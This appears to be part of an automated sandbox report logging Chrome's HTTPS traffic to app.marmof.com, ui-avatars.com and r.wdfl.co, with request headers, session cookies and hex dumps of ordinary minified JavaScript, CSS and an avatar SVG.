                                                                                                                                              2024-11-06 15:55:24 UTC16384INData Raw: 64 64 69 6e 67 2d 74 6f 70 3a 2e 33 37 35 72 65 6d 7d 2e 73 6d 5c 3a 70 74 2d 32 34 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 36 72 65 6d 7d 2e 73 6d 5c 3a 74 65 78 74 2d 6c 65 66 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 6d 5c 3a 74 65 78 74 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 73 6d 5c 3a 74 65 78 74 2d 32 78 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 72 65 6d 7d 2e 73 6d 5c 3a 74 65 78 74 2d 33 78 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 73 6d 5c 3a 74 65 78 74 2d 38 78 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 36 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31
                                                                                                                                              Data Ascii: dding-top:.375rem}.sm\:pt-24{padding-top:6rem}.sm\:text-left{text-align:left}.sm\:text-center{text-align:center}.sm\:text-2xl{font-size:1.5rem;line-height:2rem}.sm\:text-3xl{font-size:1.875rem;line-height:2.25rem}.sm\:text-8xl{font-size:6rem;line-height:1


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              4192.168.2.1849746159.69.48.314432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:23 UTC1258OUTGET /build/assets/app-49265ad1.js HTTP/1.1
                                                                                                                                              Host: app.marmof.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Origin: https://app.marmof.com
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:23 UTC377INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:23 GMT
                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                              Content-Length: 364728
                                                                                                                                              Last-Modified: Fri, 21 Jun 2024 14:30:40 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              ETag: "66758e90-590b8"
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              2024-11-06 15:55:23 UTC16007INData Raw: 63 6f 6e 73 74 20 6f 41 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 2c 73 41 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 2f 62 75 69 6c 64 2f 22 2b 65 7d 2c 79 67 3d 7b 7d 2c 65 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 69 29 7b 69 66 28 21 6e 7c 7c 6e 2e 6c 65 6e 67 74 68 3d 3d 3d 30 29 72 65 74 75 72 6e 20 74 28 29 3b 63 6f 6e 73 74 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 6c 69 6e 6b 22 29 3b 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 6e 2e 6d 61 70 28 61 3d 3e 7b 69 66 28 61 3d 73 41 28 61 29 2c 61 20 69 6e 20 79 67 29 72 65 74 75 72 6e 3b 79 67 5b 61 5d 3d 21 30 3b 63 6f 6e 73 74 20 6c 3d 61 2e 65 6e 64 73 57 69 74 68 28 22 2e 63 73 73 22 29 2c 63 3d 6c
                                                                                                                                              Data Ascii: const oA="modulepreload",sA=function(e){return"/build/"+e},yg={},ee=function(t,n,i){if(!n||n.length===0)return t();const s=document.getElementsByTagName("link");return Promise.all(n.map(a=>{if(a=sA(a),a in yg)return;yg[a]=!0;const l=a.endsWith(".css"),c=l
                                                                                                                                              2024-11-06 15:55:23 UTC16384INData Raw: 29 7b 76 61 72 20 6f 3d 2d 31 2c 75 3d 72 3d 3d 6e 75 6c 6c 3f 30 3a 72 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 74 68 69 73 2e 63 6c 65 61 72 28 29 3b 2b 2b 6f 3c 75 3b 29 7b 76 61 72 20 70 3d 72 5b 6f 5d 3b 74 68 69 73 2e 73 65 74 28 70 5b 30 5d 2c 70 5b 31 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4f 30 28 29 7b 74 68 69 73 2e 5f 5f 64 61 74 61 5f 5f 3d 5b 5d 2c 74 68 69 73 2e 73 69 7a 65 3d 30 7d 66 75 6e 63 74 69 6f 6e 20 78 30 28 72 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 5f 5f 64 61 74 61 5f 5f 2c 75 3d 52 75 28 6f 2c 72 29 3b 69 66 28 75 3c 30 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 70 3d 6f 2e 6c 65 6e 67 74 68 2d 31 3b 72 65 74 75 72 6e 20 75 3d 3d 70 3f 6f 2e 70 6f 70 28 29 3a 45 75 2e 63 61 6c 6c 28 6f 2c 75 2c 31 29 2c 2d 2d 74 68 69 73 2e 73 69 7a
                                                                                                                                              Data Ascii: ){var o=-1,u=r==null?0:r.length;for(this.clear();++o<u;){var p=r[o];this.set(p[0],p[1])}}function O0(){this.__data__=[],this.size=0}function x0(r){var o=this.__data__,u=Ru(o,r);if(u<0)return!1;var p=o.length-1;return u==p?o.pop():Eu.call(o,u,1),--this.siz
                                                                                                                                              2024-11-06 15:55:23 UTC16384INData Raw: 2c 24 3d 4c 3d 3d 22 77 72 61 70 70 65 72 22 3f 47 63 28 45 29 3a 6e 3b 24 26 26 51 63 28 24 5b 30 5d 29 26 26 24 5b 31 5d 3d 3d 28 57 7c 78 7c 46 7c 4d 29 26 26 21 24 5b 34 5d 2e 6c 65 6e 67 74 68 26 26 24 5b 39 5d 3d 3d 31 3f 54 3d 54 5b 48 75 28 24 5b 30 5d 29 5d 2e 61 70 70 6c 79 28 54 2c 24 5b 33 5d 29 3a 54 3d 45 2e 6c 65 6e 67 74 68 3d 3d 31 26 26 51 63 28 45 29 3f 54 5b 4c 5d 28 29 3a 54 2e 74 68 72 75 28 45 29 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 7a 3d 61 72 67 75 6d 65 6e 74 73 2c 47 3d 7a 5b 30 5d 3b 69 66 28 54 26 26 7a 2e 6c 65 6e 67 74 68 3d 3d 31 26 26 54 65 28 47 29 29 72 65 74 75 72 6e 20 54 2e 70 6c 61 6e 74 28 47 29 2e 76 61 6c 75 65 28 29 3b 66 6f 72 28 76 61 72 20 74 65 3d 30 2c 75 65 3d 75 3f 6f 5b 74
                                                                                                                                              Data Ascii: ,$=L=="wrapper"?Gc(E):n;$&&Qc($[0])&&$[1]==(W|x|F|M)&&!$[4].length&&$[9]==1?T=T[Hu($[0])].apply(T,$[3]):T=E.length==1&&Qc(E)?T[L]():T.thru(E)}return function(){var z=arguments,G=z[0];if(T&&z.length==1&&Te(G))return T.plant(G).value();for(var te=0,ue=u?o[t
                                                                                                                                              2024-11-06 15:55:23 UTC16384INData Raw: 5f 5f 3d 72 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 74 45 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 5f 5f 77 72 61 70 70 65 64 5f 5f 3b 69 66 28 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 65 29 7b 76 61 72 20 6f 3d 72 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 5f 61 63 74 69 6f 6e 73 5f 5f 2e 6c 65 6e 67 74 68 26 26 28 6f 3d 6e 65 77 20 57 65 28 74 68 69 73 29 29 2c 6f 3d 6f 2e 72 65 76 65 72 73 65 28 29 2c 6f 2e 5f 5f 61 63 74 69 6f 6e 73 5f 5f 2e 70 75 73 68 28 7b 66 75 6e 63 3a 6a 75 2c 61 72 67 73 3a 5b 74 66 5d 2c 74 68 69 73 41 72 67 3a 6e 7d 29 2c 6e 65 77 20 56 6e 28 6f 2c 74 68 69 73 2e 5f 5f 63 68 61 69 6e 5f 5f 29 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 74 68 72 75 28 74 66 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 45 28 29 7b 72 65 74 75 72 6e 20 6f 68 28
                                                                                                                                              Data Ascii: __=r,o}function tE(){var r=this.__wrapped__;if(r instanceof We){var o=r;return this.__actions__.length&&(o=new We(this)),o=o.reverse(),o.__actions__.push({func:ju,args:[tf],thisArg:n}),new Vn(o,this.__chain__)}return this.thru(tf)}function nE(){return oh(
                                                                                                                                              2024-11-06 15:55:23 UTC16384INData Raw: 6e 20 72 3d 3d 6e 75 6c 6c 7c 7c 72 21 3d 3d 72 3f 6f 3a 72 7d 76 61 72 20 41 53 3d 79 68 28 29 2c 50 53 3d 79 68 28 21 30 29 3b 66 75 6e 63 74 69 6f 6e 20 67 6e 28 72 29 7b 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 70 66 28 72 29 7b 72 65 74 75 72 6e 20 7a 64 28 74 79 70 65 6f 66 20 72 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 72 3a 6a 6e 28 72 2c 6d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 53 28 72 29 7b 72 65 74 75 72 6e 20 4a 64 28 6a 6e 28 72 2c 6d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 78 53 28 72 2c 6f 29 7b 72 65 74 75 72 6e 20 58 64 28 72 2c 6a 6e 28 6f 2c 6d 29 29 7d 76 61 72 20 54 53 3d 4e 65 28 66 75 6e 63 74 69 6f 6e 28 72 2c 6f 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 75 29 7b 72 65 74 75 72 6e 20 6d 61 28 75 2c 72 2c 6f 29
                                                                                                                                              Data Ascii: n r==null||r!==r?o:r}var AS=yh(),PS=yh(!0);function gn(r){return r}function pf(r){return zd(typeof r=="function"?r:jn(r,m))}function OS(r){return Jd(jn(r,m))}function xS(r,o){return Xd(r,jn(o,m))}var TS=Ne(function(r,o){return function(u){return ma(u,r,o)
                                                                                                                                              2024-11-06 15:55:23 UTC16384INData Raw: 61 3d 6e 2e 64 6f 74 73 2c 6c 3d 6e 2e 69 6e 64 65 78 65 73 2c 66 3d 28 6e 2e 42 6c 6f 62 7c 7c 74 79 70 65 6f 66 20 42 6c 6f 62 3c 22 75 22 26 26 42 6c 6f 62 29 26 26 4a 2e 69 73 53 70 65 63 43 6f 6d 70 6c 69 61 6e 74 46 6f 72 6d 28 74 29 3b 69 66 28 21 4a 2e 69 73 46 75 6e 63 74 69 6f 6e 28 73 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 76 69 73 69 74 6f 72 20 6d 75 73 74 20 62 65 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 66 75 6e 63 74 69 6f 6e 20 68 28 76 29 7b 69 66 28 76 3d 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 22 22 3b 69 66 28 4a 2e 69 73 44 61 74 65 28 76 29 29 72 65 74 75 72 6e 20 76 2e 74 6f 49 53 4f 53 74 72 69 6e 67 28 29 3b 69 66 28 21 66 26 26 4a 2e 69 73 42 6c 6f 62 28 76 29 29 74 68 72 6f 77 20 6e 65 77 20 7a 65
                                                                                                                                              Data Ascii: a=n.dots,l=n.indexes,f=(n.Blob||typeof Blob<"u"&&Blob)&&J.isSpecCompliantForm(t);if(!J.isFunction(s))throw new TypeError("visitor must be a function");function h(v){if(v===null)return"";if(J.isDate(v))return v.toISOString();if(!f&&J.isBlob(v))throw new ze
                                                                                                                                              2024-11-06 15:55:24 UTC16384INData Raw: 3d 7b 75 72 6c 3a 61 2c 6d 65 74 68 6f 64 3a 61 2c 64 61 74 61 3a 61 2c 62 61 73 65 55 52 4c 3a 6c 2c 74 72 61 6e 73 66 6f 72 6d 52 65 71 75 65 73 74 3a 6c 2c 74 72 61 6e 73 66 6f 72 6d 52 65 73 70 6f 6e 73 65 3a 6c 2c 70 61 72 61 6d 73 53 65 72 69 61 6c 69 7a 65 72 3a 6c 2c 74 69 6d 65 6f 75 74 3a 6c 2c 74 69 6d 65 6f 75 74 4d 65 73 73 61 67 65 3a 6c 2c 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 3a 6c 2c 61 64 61 70 74 65 72 3a 6c 2c 72 65 73 70 6f 6e 73 65 54 79 70 65 3a 6c 2c 78 73 72 66 43 6f 6f 6b 69 65 4e 61 6d 65 3a 6c 2c 78 73 72 66 48 65 61 64 65 72 4e 61 6d 65 3a 6c 2c 6f 6e 55 70 6c 6f 61 64 50 72 6f 67 72 65 73 73 3a 6c 2c 6f 6e 44 6f 77 6e 6c 6f 61 64 50 72 6f 67 72 65 73 73 3a 6c 2c 64 65 63 6f 6d 70 72 65 73 73 3a 6c 2c 6d 61 78 43 6f 6e
                                                                                                                                              Data Ascii: ={url:a,method:a,data:a,baseURL:l,transformRequest:l,transformResponse:l,paramsSerializer:l,timeout:l,timeoutMessage:l,withCredentials:l,adapter:l,responseType:l,xsrfCookieName:l,xsrfHeaderName:l,onUploadProgress:l,onDownloadProgress:l,decompress:l,maxCon
                                                                                                                                              2024-11-06 15:55:24 UTC16384INData Raw: 6d 5b 30 5d 29 2c 67 28 6d 5b 31 5d 29 5d 3a 67 28 6d 29 2c 64 6f 6e 65 3a 5f 7d 7d 2c 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 69 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 2e 2e 2e 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 22 64 65 6c 65 74 65 22 3f 21 31 3a 65 3d 3d 3d 22 63 6c 65 61 72 22 3f 76 6f 69 64 20 30 3a 74 68 69 73 7d 7d 66 75 6e 63 74 69 6f 6e 20 59 50 28 29 7b 63 6f 6e 73 74 20 65 3d 7b 67 65 74 28 61 29 7b 72 65 74 75 72 6e 20 59 75 28 74 68 69 73 2c 61 29 7d 2c 67 65 74 20 73 69 7a 65 28 29 7b 72 65 74 75 72 6e 20 5a 75 28 74 68 69 73 29 7d 2c 68 61 73 3a 51 75 2c 61 64 64 3a 46 67 2c 73 65 74 3a 4e 67 2c 64 65 6c 65 74 65 3a 4d
                                                                                                                                              Data Ascii: m[0]),g(m[1])]:g(m),done:_}},[Symbol.iterator](){return this}}}}function Ai(e){return function(...t){return e==="delete"?!1:e==="clear"?void 0:this}}function YP(){const e={get(a){return Yu(this,a)},get size(){return Zu(this)},has:Qu,add:Fg,set:Ng,delete:M
                                                                                                                                              2024-11-06 15:55:24 UTC16384INData Raw: 2c 74 2c 6e 2c 69 29 7b 63 6f 6e 73 74 20 73 3d 65 2e 64 69 72 73 2c 61 3d 74 26 26 74 2e 64 69 72 73 3b 66 6f 72 28 6c 65 74 20 6c 3d 30 3b 6c 3c 73 2e 6c 65 6e 67 74 68 3b 6c 2b 2b 29 7b 63 6f 6e 73 74 20 63 3d 73 5b 6c 5d 3b 61 26 26 28 63 2e 6f 6c 64 56 61 6c 75 65 3d 61 5b 6c 5d 2e 76 61 6c 75 65 29 3b 6c 65 74 20 66 3d 63 2e 64 69 72 5b 69 5d 3b 66 26 26 28 4e 73 28 29 2c 58 6e 28 66 2c 6e 2c 38 2c 5b 65 2e 65 6c 2c 63 2c 65 2c 74 5d 29 2c 4d 73 28 29 29 7d 7d 63 6f 6e 73 74 20 52 69 3d 53 79 6d 62 6f 6c 28 22 5f 6c 65 61 76 65 43 62 22 29 2c 69 6c 3d 53 79 6d 62 6f 6c 28 22 5f 65 6e 74 65 72 43 62 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 76 28 29 7b 63 6f 6e 73 74 20 65 3d 7b 69 73 4d 6f 75 6e 74 65 64 3a 21 31 2c 69 73 4c 65 61 76 69 6e 67 3a 21 31
                                                                                                                                              Data Ascii: ,t,n,i){const s=e.dirs,a=t&&t.dirs;for(let l=0;l<s.length;l++){const c=s[l];a&&(c.oldValue=a[l].value);let f=c.dir[i];f&&(Ns(),Xn(f,n,8,[e.el,c,e,t]),Ms())}}const Ri=Symbol("_leaveCb"),il=Symbol("_enterCb");function nv(){const e={isMounted:!1,isLeaving:!1
                                                                                                                                              2024-11-06 15:55:24 UTC16384INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 73 78 28 65 2c 74 2c 6e 2c 69 3d 21 31 29 7b 63 6f 6e 73 74 20 73 3d 7b 7d 2c 61 3d 7b 7d 3b 50 6c 28 61 2c 75 63 2c 31 29 2c 65 2e 70 72 6f 70 73 44 65 66 61 75 6c 74 73 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 2c 63 76 28 65 2c 74 2c 73 2c 61 29 3b 66 6f 72 28 63 6f 6e 73 74 20 6c 20 69 6e 20 65 2e 70 72 6f 70 73 4f 70 74 69 6f 6e 73 5b 30 5d 29 6c 20 69 6e 20 73 7c 7c 28 73 5b 6c 5d 3d 76 6f 69 64 20 30 29 3b 6e 3f 65 2e 70 72 6f 70 73 3d 69 3f 73 3a 75 4f 28 73 29 3a 65 2e 74 79 70 65 2e 70 72 6f 70 73 3f 65 2e 70 72 6f 70 73 3d 73 3a 65 2e 70 72 6f 70 73 3d 61 2c 65 2e 61 74 74 72 73 3d 61 7d 66 75 6e 63 74 69 6f 6e 20 61 78 28 65 2c 74 2c 6e 2c 69 29 7b 63 6f 6e 73 74 7b 70 72 6f 70 73 3a 73 2c 61 74
                                                                                                                                              Data Ascii: }function sx(e,t,n,i=!1){const s={},a={};Pl(a,uc,1),e.propsDefaults=Object.create(null),cv(e,t,s,a);for(const l in e.propsOptions[0])l in s||(s[l]=void 0);n?e.props=i?s:uO(s):e.type.props?e.props=s:e.props=a,e.attrs=a}function ax(e,t,n,i){const{props:s,at


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              5192.168.2.1849749104.26.8.1854432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:24 UTC616OUTGET /api/?name=A+J&color=ffffff&background=f34b1d HTTP/1.1
                                                                                                                                              Host: ui-avatars.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://app.marmof.com/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:24 UTC1202INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:24 GMT
                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              pragma: public
                                                                                                                                              access-control-allow-origin: *
                                                                                                                                              access-control-allow-origin: *
                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                              access-control-allow-methods: GET, OPTIONS
                                                                                                                                              access-control-allow-methods: GET, OPTIONS
                                                                                                                                              access-control-max-age: 31536000
                                                                                                                                              access-control-max-age: 31536000
                                                                                                                                              access-control-allow-headers: Content-Type, Accept, X-Requested-With, remember-me, cache-control
                                                                                                                                              access-control-allow-headers: Content-Type, Accept, X-Requested-With, remember-me, cache-control
                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                              expires: Thu, 06 Nov 2025 11:06:47 GMT
                                                                                                                                              Last-Modified: Wed, 06 Nov 2024 11:06:47 GMT
                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                              Age: 5318
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PUim%2BSFO%2FXClaNl4i3ZDxc3tAGLcuJL2h6%2BRYTrcO7uf%2FcwqZFB8jQ1d9RQtHR2O4ILH3yoLF%2BpvZQt8G5%2BDbODUmoeBljY9IF9W%2BbBMxhGDgVsIstuspDput5UfcTA7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de64484ca436900-DFW
                                                                                                                                              2024-11-06 15:55:24 UTC191INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 38 31 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 34 26 72 65 63 76 5f 62 79 74 65 73 3d 31 31 39 34 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 34 30 31 33 32 36 26 63 77 6e 64 3d 32 32 38 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 63 31 34 39 31 66 37 31 63 33 35 31 39 66 34 64 26 74 73 3d 31 36 33 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                                                              Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1181&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1194&delivery_rate=2401326&cwnd=228&unsent_bytes=0&cid=c1491f71c3519f4d&ts=163&x=0"
                                                                                                                                              2024-11-06 15:55:24 UTC576INData Raw: 32 33 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 77 69 64 74 68 3d 22 36 34 70 78 22 20 68 65 69 67 68 74 3d 22 36 34 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 34 20 36 34 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 3c 72 65 63 74 20 66 69 6c 6c 3d 22 23 66 33 34 62 31 64 22 20 63 78 3d 22 33 32 22 20 77 69 64 74 68 3d 22 36 34 22 20 68 65 69 67 68 74 3d 22 36 34 22 20 63 79 3d 22 33 32 22 20 72 3d 22 33 32 22 2f 3e 3c 74 65 78 74 20 78 3d 22 35 30 25 22 20 79 3d 22 35 30 25 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66
                                                                                                                                              Data Ascii: 239<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="64px" height="64px" viewBox="0 0 64 64" version="1.1"><rect fill="#f34b1d" cx="32" width="64" height="64" cy="32" r="32"/><text x="50%" y="50%" style="color: #f
                                                                                                                                              2024-11-06 15:55:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              6192.168.2.184975018.66.147.684432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:24 UTC338OUTGET /rw.js HTTP/1.1
                                                                                                                                              Host: r.wdfl.co
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:24 UTC530INHTTP/1.1 200 OK
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 18631
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Tue, 05 Nov 2024 07:12:21 GMT
                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Server: AmazonS3
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:23 GMT
                                                                                                                                              Cache-Control: max-age=3600
                                                                                                                                              ETag: "05550215707fb77f6d07bcc793526e28"
                                                                                                                                              X-Cache: Hit from cloudfront
                                                                                                                                              Via: 1.1 6b25d4ce9efa3f2699980e1915129606.cloudfront.net (CloudFront)
                                                                                                                                              X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                              X-Amz-Cf-Id: f821Kc22BBXYoweq8BGDsif0PzCgSO0LDuklbD0_4L7dy7ITC6uvcQ==
                                                                                                                                              Age: 851
                                                                                                                                              2024-11-06 15:55:24 UTC15854INData Raw: 2f 2a 21 20 42 75 69 6c 64 20 34 37 31 35 62 63 63 64 35 38 64 39 39 35 39 35 34 36 36 61 30 62 36 36 34 30 61 33 35 36 64 65 32 37 36 37 62 35 39 39 3a 31 37 33 30 37 33 34 38 33 38 34 35 30 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 72 29 2c 6f 2e 6c 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 72 2e 6d 3d 65 2c 72 2e 63 3d 74 2c 72 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29
